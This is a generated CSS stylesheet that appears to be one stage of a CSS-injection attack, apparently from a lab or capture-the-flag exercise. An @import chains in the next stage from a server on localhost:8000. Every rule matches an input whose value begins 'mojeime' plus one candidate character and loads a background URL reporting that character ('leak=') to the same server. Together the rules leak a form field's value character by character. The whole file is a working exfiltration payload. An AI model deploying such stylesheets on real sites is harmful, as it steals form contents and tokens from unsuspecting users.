@import url("http://localhost:8000/?l=9");
input[value="mojeime!"] {background: url("http://localhost:8000/?leak=!&q=0.3566707707918171");}
input[value="mojeime\""] {background: url("http://localhost:8000/?leak=\"&q=0.039269986218299024");}
input[value="mojeime#"] {background: url("http://localhost:8000/?leak=#&q=0.44424536603007736");}
input[value="mojeime$"] {background: url("http://localhost:8000/?leak=$&q=0.18265291840056164");}
input[value="mojeime%"] {background: url("http://localhost:8000/?leak=%&q=0.9965755536260605");}
input[value="mojeime&"] {background: url("http://localhost:8000/?leak=&&q=0.318604650793348");}
input[value="mojeime'"] {background: url("http://localhost:8000/?leak='&q=0.5929702235921412");}
input[value="mojeime("] {background: url("http://localhost:8000/?leak=(&q=0.05069108827942359");}
input[value="mojeime)"] {background: url("http://localhost:8000/?leak=)&q=0.023843206950367124");}
input[value="mojeime*"] {background: url("http://localhost:8000/?leak=*&q=0.7614650985460407");}
input[value="mojeime+"] {background: url("http://localhost:8000/?leak=+&q=0.2654455282773074");}
input[value="mojeime,"] {background: url("http://localhost:8000/?leak=,&q=0.3398451867385399");}
input[value="mojeime-"] {background: url("http://localhost:8000/?leak=-&q=0.6255721357809358");}
input[value="mojeime."] {background: url("http://localhost:8000/?leak=.&q=0.9841463312110286");}
input[value="mojeime/"] {background: url("http://localhost:8000/?leak=/&q=0.9688050054994053");}
input[value="mojeime0"] {background: url("http://localhost:8000/?leak=0&q=0.004862075189012938");}
input[value="mojeime1"] {background: url("http://localhost:8000/?leak=1&q=0.6444846826725041");}
input[value="mojeime2"] {background: url("http://localhost:8000/?leak=2&q=0.549257490109436");}
input[value="mojeime3"] {background: url("http://localhost:8000/?leak=3&q=0.7867206496672434");}
input[value="mojeime4"] {background: url("http://localhost:8000/?leak=4&q=0.7742803787077126");}
input[value="mojeime5"] {background: url("http://localhost:8000/?leak=5&q=0.9856908327743106");}
input[value="mojeime6"] {background: url("http://localhost:8000/?leak=6&q=0.22808277433625124");}
input[value="mojeime7"] {background: url("http://localhost:8000/?leak=7&q=0.7737154389063321");}
input[value="mojeime8"] {background: url("http://localhost:8000/?leak=8&q=0.5889409733609385");}
input[value="mojeime9"] {background: url("http://localhost:8000/?leak=9&q=0.850346919724507");}
input[value="mojeime:"] {background: url("http://localhost:8000/?leak=:&q=0.5881702098221335");}
input[value="mojeime;"] {background: url("http://localhost:8000/?leak=;&q=0.8752075465454834");}
input[value="mojeime<"] {background: url("http://localhost:8000/?leak=<&q=0.2480678915901775");}
input[value="mojeime="] {background: url("http://localhost:8000/?leak==&q=0.7314439568611291");}
input[value="mojeime>"] {background: url("http://localhost:8000/?leak=>&q=0.5192680304753001");}
input[value="mojeime?"] {background: url("http://localhost:8000/?leak=?&q=0.8395562075851519");}
input[value="mojeime@"] {background: url("http://localhost:8000/?leak=@&q=0.4630077342569807");}
input[value="mojeimeA"] {background: url("http://localhost:8000/?leak=A&q=0.4135581569563558");}
input[value="mojeimeB"] {background: url("http://localhost:8000/?leak=B&q=0.6641484613611681");}
input[value="mojeimeC"] {background: url("http://localhost:8000/?leak=C&q=0.9803887311584492");}
input[value="mojeimeD"] {background: url("http://localhost:8000/?leak=D&q=0.05216315517102377");}
input[value="mojeimeE"] {background: url("http://localhost:8000/?leak=E&q=0.8108800946849217");}
input[value="mojeimeF"] {background: url("http://localhost:8000/?leak=F&q=0.7701362488128451");}
input[value="mojeimeG"] {background: url("http://localhost:8000/?leak=G&q=0.7080427090234289");}
input[value="mojeimeH"] {background: url("http://localhost:8000/?leak=H&q=0.4421275264937907");}
input[value="mojeimeI"] {background: url("http://localhost:8000/?leak=I&q=0.11042498154300584");}
input[value="mojeimeJ"] {background: url("http://localhost:8000/?leak=J&q=0.11376341357985664");}
input[value="mojeimeK"] {background: url("http://localhost:8000/?leak=K&q=0.325387933729929");}
input[value="mojeimeL"] {background: url("http://localhost:8000/?leak=L&q=0.1412764311088479");}
input[value="mojeimeM"] {background: url("http://localhost:8000/?leak=M&q=0.3026725374895378");}
input[value="mojeimeN"] {background: url("http://localhost:8000/?leak=N&q=0.9225840255294302");}
input[value="mojeimeO"] {background: url("http://localhost:8000/?leak=O&q=0.9175044040074565");}
input[value="mojeimeP"] {background: url("http://localhost:8000/?leak=P&q=0.3210731384668344");}
input[value="mojeimeQ"] {background: url("http://localhost:8000/?leak=Q&q=0.8908014789273844");}
input[value="mojeimeR"] {background: url("http://localhost:8000/?leak=R&q=0.04833332221508524");}
input[value="mojeimeS"] {background: url("http://localhost:8000/?leak=S&q=0.7027949583858726");}
input[value="mojeimeT"] {background: url("http://localhost:8000/?leak=T&q=0.6644105919987087");}
input[value="mojeimeU"] {background: url("http://localhost:8000/?leak=U&q=0.1214798896271847");}
input[value="mojeimeV"] {background: url("http://localhost:8000/?leak=V&q=0.11980898427222453");}
input[value="mojeimeW"] {background: url("http://localhost:8000/?leak=W&q=0.062958827993423");}
input[value="mojeimeX"] {background: url("http://localhost:8000/?leak=X&q=0.6905467779080858");}
input[value="mojeimeY"] {background: url("http://localhost:8000/?leak=Y&q=0.40641967529758083");}
input[value="mojeimeZ"] {background: url("http://localhost:8000/?leak=Z&q=0.9635615639206132");}
input[value="mojeime["] {background: url("http://localhost:8000/?leak=[&q=0.09633784367159048");}
input[value="mojeime\\"] {background: url("http://localhost:8000/?leak=\\&q=0.6788740681904759");}
input[value="mojeime]"] {background: url("http://localhost:8000/?leak=]&q=0.5751569256850495");}
input[value="mojeime^"] {background: url("http://localhost:8000/?leak=^&q=0.7064739855892561");}
input[value="mojeime_"] {background: url("http://localhost:8000/?leak=_&q=0.621996940114554");}
input[value="mojeime`"] {background: url("http://localhost:8000/?leak=`&q=0.10299099247891852");}
input[value="mojeimea"] {background: url("http://localhost:8000/?leak=a&q=0.6393579427203344");}
input[value="mojeimeb"] {background: url("http://localhost:8000/?leak=b&q=0.09048469800404568");}
input[value="mojeimec"] {background: url("http://localhost:8000/?leak=c&q=0.05320436801931616");}
input[value="mojeimed"] {background: url("http://localhost:8000/?leak=d&q=0.23594424192318764");}
input[value="mojeimee"] {background: url("http://localhost:8000/?leak=e&q=0.3203858004457414");}
input[value="mojeimef"] {background: url("http://localhost:8000/?leak=f&q=0.5998836157279919");}
input[value="mojeimeg"] {background: url("http://localhost:8000/?leak=g&q=0.302988770997463");}
input[value="mojeimeh"] {background: url("http://localhost:8000/?leak=h&q=0.8501328125189074");}
input[value="mojeimei"] {background: url("http://localhost:8000/?leak=i&q=0.9563930510745824");}
input[value="mojeimej"] {background: url("http://localhost:8000/?leak=j&q=0.3427427680795567");}
input[value="mojeimek"] {background: url("http://localhost:8000/?leak=k&q=0.9939317247245323");}
input[value="mojeimel"] {background: url("http://localhost:8000/?leak=l&q=0.053264330240242685");}
input[value="mojeimem"] {background: url("http://localhost:8000/?leak=m&q=0.9967684664554448");}
input[value="mojeimen"] {background: url("http://localhost:8000/?leak=n&q=0.3766687556225554");}
input[value="mojeimeo"] {background: url("http://localhost:8000/?leak=o&q=0.08240336879790466");}
input[value="mojeimep"] {background: url("http://localhost:8000/?leak=p&q=0.1719612534965218");}
input[value="mojeimeq"] {background: url("http://localhost:8000/?leak=q&q=0.6193066295768452");}
input[value="mojeimer"] {background: url("http://localhost:8000/?leak=r&q=0.5565248946129444");}
input[value="mojeimes"] {background: url("http://localhost:8000/?leak=s&q=0.37697916673051934");}
input[value="mojeimet"] {background: url("http://localhost:8000/?leak=t&q=0.43655754498586385");}
input[value="mojeimeu"] {background: url("http://localhost:8000/?leak=u&q=0.19236476629421206");}
input[value="mojeimev"] {background: url("http://localhost:8000/?leak=v&q=0.9248010152896282");}
input[value="mojeimew"] {background: url("http://localhost:8000/?leak=w&q=0.8487436313685852");}
input[value="mojeimex"] {background: url("http://localhost:8000/?leak=x&q=0.6347662217908194");}
input[value="mojeimey"] {background: url("http://localhost:8000/?leak=y&q=0.7772426031336246");}
input[value="mojeimez"] {background: url("http://localhost:8000/?leak=z&q=0.6117085537108424");}
input[value="mojeime{"] {background: url("http://localhost:8000/?leak={&q=0.8905955504368088");}
input[value="mojeime|"] {background: url("http://localhost:8000/?leak=|&q=0.46953216266967823");}
input[value="mojeime}"] {background: url("http://localhost:8000/?leak=}&q=0.8855468849059984");}
input[value="mojeime~"] {background: url("http://localhost:8000/?leak=~&q=0.1310494495792236");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.39857266544265824");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.6238182023213654");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.3306321975604334");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7862980133946782");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7155400850251781");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.45449942665261145");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.9528166894456782");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.8327496744568617");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.12571820450769344");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.5598197242371876");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.004214204314854086");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.8810084518245493");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.40235310312864403");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.02173382051080619");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7823653131209254");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.4871024902076475");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.2392330791715196");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.8206514504227718");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.5450135406338399");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.6921249573865562");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7001621481641604");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7529143954191821");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.9917453616970116");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.6180316979763425");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.6154324969089866");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.9500732492576764");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.2721512566529787");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.689804747310595");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.04810495975055762");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.2547165358753807");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7008400599602618");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.13066261352734787");}
input[value="mojeime"] {background: url("http://localhost:8000/?leak=&q=0.7693644052991806");}
input[value="mojeime "] {background: url("http://localhost:8000/?leak= &q=0.2865286304082033");}
input[value="mojeime¡"] {background: url("http://localhost:8000/?leak=¡&q=0.608325716741031");}
input[value="mojeime¢"] {background: url("http://localhost:8000/?leak=¢&q=0.18258561421684805");}
input[value="mojeime£"] {background: url("http://localhost:8000/?leak=£&q=0.10883050764922975");}
input[value="mojeime¤"] {background: url("http://localhost:8000/?leak=¤&q=0.4990792764564642");}
input[value="mojeime¥"] {background: url("http://localhost:8000/?leak=¥&q=0.29470349462611845");}
input[value="mojeime¦"] {background: url("http://localhost:8000/?leak=¦&q=0.4595296023451747");}
input[value="mojeime§"] {background: url("http://localhost:8000/?leak=§&q=0.8176622710879602");}
input[value="mojeime¨"] {background: url("http://localhost:8000/?leak=¨&q=0.7842916573784444");}
input[value="mojeime©"] {background: url("http://localhost:8000/?leak=©&q=0.9149875599659141");}
input[value="mojeimeª"] {background: url("http://localhost:8000/?leak=ª&q=0.15358996580091677");}
input[value="mojeime«"] {background: url("http://localhost:8000/?leak=«&q=0.8065627269971773");}
input[value="mojeime¬"] {background: url("http://localhost:8000/?leak=¬&q=0.9458823556305167");}
input[value="mojeime­"] {background: url("http://localhost:8000/?leak=­&q=0.16209555081240312");}
input[value="mojeime®"] {background: url("http://localhost:8000/?leak=®&q=0.8442910475886096");}
input[value="mojeime¯"] {background: url("http://localhost:8000/?leak=¯&q=0.7735533691722098");}
input[value="mojeime°"] {background: url("http://localhost:8000/?leak=°&q=0.2551391334199491");}
input[value="mojeime±"] {background: url("http://localhost:8000/?leak=±&q=0.7235869500980041");}
input[value="mojeime²"] {background: url("http://localhost:8000/?leak=²&q=0.25626442115170156");}
input[value="mojeime³"] {background: url("http://localhost:8000/?leak=³&q=0.02489262714959528");}
input[value="mojeime´"] {background: url("http://localhost:8000/?leak=´&q=0.5792837350905782");}
input[value="mojeimeµ"] {background: url("http://localhost:8000/?leak=µ&q=0.4739255817465404");}
input[value="mojeime¶"] {background: url("http://localhost:8000/?leak=¶&q=0.32103676140939585");}
input[value="mojeime·"] {background: url("http://localhost:8000/?leak=·&q=0.043520924855107834");}
input[value="mojeime¸"] {background: url("http://localhost:8000/?leak=¸&q=0.7232612677465546");}
input[value="mojeime¹"] {background: url("http://localhost:8000/?leak=¹&q=0.06765039303816378");}
input[value="mojeimeº"] {background: url("http://localhost:8000/?leak=º&q=0.6069247432412199");}
input[value="mojeime»"] {background: url("http://localhost:8000/?leak=»&q=0.8330431945136805");}
input[value="mojeime¼"] {background: url("http://localhost:8000/?leak=¼&q=0.795837824170426");}
input[value="mojeime½"] {background: url("http://localhost:8000/?leak=½&q=0.25356092619784576");}
input[value="mojeime¾"] {background: url("http://localhost:8000/?leak=¾&q=0.4347330350591918");}
input[value="mojeime¿"] {background: url("http://localhost:8000/?leak=¿&q=0.7951599835475385");}
input[value="mojeimeÀ"] {background: url("http://localhost:8000/?leak=À&q=0.8216766659094707");}
input[value="mojeimeÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.8857658953684922");}
input[value="mojeimeÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.8890225828458993");}
input[value="mojeimeÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.5858841797285599");}
input[value="mojeimeÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.7725513073723322");}
input[value="mojeimeÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.2639145777541263");}
input[value="mojeimeÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.5301233511333863");}
input[value="mojeimeÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.6745260410047531");}
input[value="mojeimeÈ"] {background: url("http://localhost:8000/?leak=È&q=0.6499676118514255");}
input[value="mojeimeÉ"] {background: url("http://localhost:8000/?leak=É&q=0.034605629833320606");}
input[value="mojeimeÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.6551876987664753");}
input[value="mojeimeË"] {background: url("http://localhost:8000/?leak=Ë&q=0.8400869042415193");}
input[value="mojeimeÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.018023712516993307");}
input[value="mojeimeÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.2800690052960606");}
input[value="mojeimeÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.2380170795131975");}
input[value="mojeimeÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.7334612220424388");}
input[value="mojeimeÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.364459830207422");}
input[value="mojeimeÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.07288137902654634");}
input[value="mojeimeÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.5041372799071895");}
input[value="mojeimeÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.029237673097872063");}
input[value="mojeimeÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.09551425157038329");}
input[value="mojeimeÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.31715759720947956");}
input[value="mojeimeÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.6438986567622083");}
input[value="mojeime×"] {background: url("http://localhost:8000/?leak=×&q=0.5793739884841598");}
input[value="mojeimeØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.9587339206137846");}
input[value="mojeimeÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.2996332839791911");}
input[value="mojeimeÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.19082512063849766");}
input[value="mojeimeÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.11915805011261238");}
input[value="mojeimeÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.33672992504155697");}
input[value="mojeimeÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.7824465675985652");}
input[value="mojeimeÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.3830529495187074");}
input[value="mojeimeß"] {background: url("http://localhost:8000/?leak=ß&q=0.18871756221518488");}
input[value="mojeimeà"] {background: url("http://localhost:8000/?leak=à&q=0.7599410634068056");}
input[value="mojeimeá"] {background: url("http://localhost:8000/?leak=á&q=0.26633367559697163");}
input[value="mojeimeâ"] {background: url("http://localhost:8000/?leak=â&q=0.5591967056199014");}
input[value="mojeimeã"] {background: url("http://localhost:8000/?leak=ã&q=0.1715659028904739");}
input[value="mojeimeä"] {background: url("http://localhost:8000/?leak=ä&q=0.7826182416724665");}
input[value="mojeimeå"] {background: url("http://localhost:8000/?leak=å&q=0.7119175149641832");}
input[value="mojeimeæ"] {background: url("http://localhost:8000/?leak=æ&q=0.2590909416851157");}
input[value="mojeimeç"] {background: url("http://localhost:8000/?leak=ç&q=0.5736879143305438");}
input[value="mojeimeè"] {background: url("http://localhost:8000/?leak=è&q=0.1769605707135673");}
input[value="mojeimeé"] {background: url("http://localhost:8000/?leak=é&q=0.2228793335237096");}
input[value="mojeimeê"] {background: url("http://localhost:8000/?leak=ê&q=0.05965817146989871");}
input[value="mojeimeë"] {background: url("http://localhost:8000/?leak=ë&q=0.511770746919733");}
input[value="mojeimeì"] {background: url("http://localhost:8000/?leak=ì&q=0.44890224879665963");}
input[value="mojeimeí"] {background: url("http://localhost:8000/?leak=í&q=0.9275298103361518");}
input[value="mojeimeî"] {background: url("http://localhost:8000/?leak=î&q=0.7248545591482274");}
input[value="mojeimeï"] {background: url("http://localhost:8000/?leak=ï&q=0.9064898943623687");}
input[value="mojeimeð"] {background: url("http://localhost:8000/?leak=ð&q=0.7399571595268863");}
input[value="mojeimeñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.5583559000584983");}
input[value="mojeimeò"] {background: url("http://localhost:8000/?leak=ò&q=0.6599655019215216");}
input[value="mojeimeó"] {background: url("http://localhost:8000/?leak=ó&q=0.12895906013794756");}
input[value="mojeimeô"] {background: url("http://localhost:8000/?leak=ô&q=0.4511827255123029");}
input[value="mojeimeõ"] {background: url("http://localhost:8000/?leak=õ&q=0.35225610554829734");}
input[value="mojeimeö"] {background: url("http://localhost:8000/?leak=ö&q=0.6136331765637975");}
input[value="mojeime÷"] {background: url("http://localhost:8000/?leak=÷&q=0.10918675967268499");}
input[value="mojeimeø"] {background: url("http://localhost:8000/?leak=ø&q=0.7435828751659561");}
input[value="mojeimeù"] {background: url("http://localhost:8000/?leak=ù&q=0.4053336575957256");}
input[value="mojeimeú"] {background: url("http://localhost:8000/?leak=ú&q=0.8703429622985879");}
input[value="mojeimeû"] {background: url("http://localhost:8000/?leak=û&q=0.5846684168135605");}
input[value="mojeimeü"] {background: url("http://localhost:8000/?leak=ü&q=0.9535579397141898");}
input[value="mojeimeý"] {background: url("http://localhost:8000/?leak=ý&q=0.2954851201065858");}
input[value="mojeimeþ"] {background: url("http://localhost:8000/?leak=þ&q=0.4322963891900238");}
input[value="mojeimeÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.5187964294232139");}
